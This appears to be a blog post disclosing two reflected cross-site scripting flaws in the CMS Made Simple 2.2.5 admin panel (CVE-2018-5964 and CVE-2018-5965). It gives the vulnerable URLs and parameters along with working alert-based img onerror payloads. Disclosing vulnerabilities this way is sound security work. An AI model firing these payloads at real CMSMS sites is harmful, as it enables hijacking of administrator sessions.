CMS Made Simple 2.2.5 Reflected Cross Site Scripting

CVE-2018-5964, CVE-2018-5965

CVE-2018-5964

CMS Made Simple (CMSMS) 2.2.5 has Reflected XSS in

 /admin/moduleinterface.php?
mact=ModuleManager,m1_,defaultadmin,0&_sk_=d07f6f6eb9b1a92a741&m1___activetab
=installed&m1___messages=CMSMailer%20module%20has%20been%20successfully%20i
via the m1__messages parameter.

After some installing or uninstalling modules, this will show After blah blah with parameter m1_message. Use this m1_message parameter value as ‘>”><img src=x onerror=alert(document.domain)> and then lead to XSS.

Screen Shot 2018-01-22 at 10.16.37 AM

CVE-2018-5965

Another possible parameter that can possible to execute javascript is ….

GET /cmsms-2.2.5-install/admin/moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=ba5e56a6aa91ad93f43&m1___activetab=templates&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E

I read lots of paper and website about this CMS. They don’t give bounty for using admin role. So i repot to mitre and got this CVE-2018-5964,CVE-2018-5965.

ref:

http://seclists.org/fulldisclosure/2018/Jan/82

http://seclists.org/fulldisclosure/2018/Jan/83

Advertisement
Privacy Settings
Posted in CVE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s